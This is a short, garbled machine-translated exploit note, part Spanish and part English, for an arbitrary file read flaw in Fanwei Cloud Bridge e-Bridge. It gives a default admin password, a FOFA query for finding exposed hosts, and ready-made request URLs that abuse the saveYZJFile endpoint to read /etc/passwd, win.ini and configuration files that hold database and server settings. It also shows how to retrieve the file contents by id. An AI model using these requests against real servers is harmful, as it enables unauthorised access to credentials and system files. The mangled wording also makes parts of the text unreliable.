Vulnerabilidad de lectura de archivos arbitrarios de Fanwei Cloud Bridge e-Bridge
La vulnerabilidad 0x00 afecta a la versión:
esta vulnerabilidad afecta a casi todas las versiones de 2018-2019.
0x01 Vulnerability exploit:
contraseña predeterminada sysadmin / 1
fofa frase de búsqueda: title = "Fanwei Cloud Bridge"
Causa principal
/ wxjsapi / saveYZJFil interfaz para obtener la ruta del archivo, devolver la ruta absoluta del programa en el paquete de datos, el atacante puede descargar el relevante
estructura dearchivo sensible de lasiguiente manera
http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
Directorio de archivos sensibles relacionados
windows: d://ebridge
linux:/usr/ebridge
etc/passwd
c://windows/win.ini
d://ebridge/tomcat/conf/server.xml
d://ebridge/mysql/my.ini d://ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.properties
Obtener valor de identificación
Obtener el contenido del archivo por valor de id
http://x.x.x.x/file/fileNoLogin/cf1b577f21ad41199b82d983c89bfd05